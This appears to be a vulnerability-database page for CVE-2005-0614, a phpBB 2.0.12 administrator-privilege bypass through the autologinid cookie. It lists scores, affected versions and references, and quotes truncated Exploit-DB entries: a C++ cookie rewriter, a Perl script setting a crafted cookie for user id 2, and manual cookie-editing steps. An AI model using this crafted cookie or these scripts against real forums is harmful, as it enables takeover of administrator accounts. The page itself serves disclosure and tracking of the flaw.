CVE-2005-0614
published 2005-05-02CVE-2005-0614: sessions.php in phpBB 2.0.12 and earlier allows remote attackers to gain administrator privileges via the autologinid value in a cookie.
PriorityP349high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
7.55%
93.8th percentile
sessions.php in phpBB 2.0.12 and earlier allows remote attackers to gain administrator privileges via the autologinid value in a cookie.
Affected
29 ranges· showing 25
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| phpbb_group | phpbb | — | — |
| phpbb_group | phpbb | — | — |
| phpbb_group | phpbb | — | — |
| phpbb_group | phpbb | — | — |
| phpbb_group | phpbb | — | — |
| phpbb_group | phpbb | — | — |
| phpbb_group | phpbb | — | — |
| phpbb_group | phpbb | — | — |
| phpbb_group | phpbb | — | — |
| phpbb_group | phpbb | — | — |
| phpbb_group | phpbb | — | — |
| phpbb_group | phpbb | — | — |
| phpbb_group | phpbb | — | — |
| phpbb_group | phpbb | — | — |
| phpbb_group | phpbb | — | — |
| phpbb_group | phpbb | — | — |
| phpbb_group | phpbb | — | — |
| phpbb_group | phpbb | — | — |
| phpbb_group | phpbb | — | — |
| phpbb_group | phpbb | — | — |
| phpbb_group | phpbb | — | — |
| phpbb_group | phpbb | — | — |
| phpbb_group | phpbb | — | — |
| phpbb_group | phpbb | — | — |
| phpbb_group | phpbb | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
phpBB 2.0.12 - Change User Rights Authentication Bypass
exploitdb·2005-03-24
CVE-2005-0614 phpBB 2.0.12 - Change User Rights Authentication Bypass
phpBB 2.0.12 - Change User Rights Authentication Bypass
---
/* Paisterist's code was nice but heres mil's version.
* precompiled: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/897.rar
* Usage:
* bcc32 897.cpp
* and place the exe in your firefox profile dir.
* Usually C:\Documents and Settings\Application Data\Mozilla\Firefox\Profiles\something.default
* Visit a site with phpbb, close the browser, double click the exe, browse site.
* This gives anonymous users administrator rights only.
* Ya its lame im bored kthnx. If something goes wrong clear cookies.
*
* /str0ke
*/
#include
#include
#include
//Taken from VeNoMouS's love cow code
char *search_and_replace (char *text, char *find, char *replace)
{
char *found,*new_text;
int
len_find=strlen(find),len_r
Exploit-DB
phpBB 2.0.12 - Change User Rights Authentication Bypass
exploitdb·2005-03-21
CVE-2005-0614 phpBB 2.0.12 - Change User Rights Authentication Bypass
phpBB 2.0.12 - Change User Rights Authentication Bypass
---
#!/usr/bin/perl -w
# phpBB new ();
my $cookie_jar = HTTP::Cookies->new( );
$browser->cookie_jar( $cookie_jar );
$cookie_jar->set_cookie( "0","phpbb2mysql_data", "a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D", "/",$host,,,,,);
if ( defined $proxy) {
$proxy =~ s/(http:\/\/)//eg;
$browser->proxy("http" , "http://$proxy");
}
print "++++++++++++++++++++++++++++++++++++\n";
print "Trying to connect to $host$path"; if ($proxy) {print "using proxy $proxy";}
my $response = $browser->get($request);
die "Error: ", $response->status_line
unless $response->is_success;
if($response->content =~ m/phpbbprivmsg/) {
print "\n Forum is vulnerable!!!\n";
} else {
print "Sorry... Not vulnerable"; ex
Exploit-DB
phpBB 2.0.12 - Session Handling Authentication Bypass
exploitdb·2005-03-11
CVE-2005-0614 phpBB 2.0.12 - Session Handling Authentication Bypass
phpBB 2.0.12 - Session Handling Authentication Bypass
---
phpBB 2.0.12 Session Handling Authentication Bypass ..
easy to use exploit ..
** YOU DON'T HAVE TO REGISTER AT THE VICTIM'S FORUM..
1- Simply VISIT the forum using Mozilla Firefox.. and be sure that the cookie is made (:
3- Close the Browser ..
2- Open the cookies.txt ..((located on "C:\Documents and Settings\ALI\Application Data\Mozilla\Firefox\Profiles\ur4nn6o5.default" when using WinXP)) in example ;)
and you will find something like :
---------------------------------------------------------------------------------------------------------------\\
127.0.0.1 FALSE / FALSE 1141920503 phpbb2mysql_data a%3A0%3A%7B%7D
--------------------------------------------------------------------------------------------------------------
No writeups or analysis indexed.
http://marc.info/?l=bugtraq&m=110970201920206&w=2http://marc.info/?l=bugtraq&m=110999268130739&w=2http://secunia.com/advisories/14413http://www.phpbb.com/phpBB/viewtopic.php?t=267563http://marc.info/?l=bugtraq&m=110970201920206&w=2http://marc.info/?l=bugtraq&m=110999268130739&w=2http://secunia.com/advisories/14413http://www.phpbb.com/phpBB/viewtopic.php?t=267563
2005-05-02
Published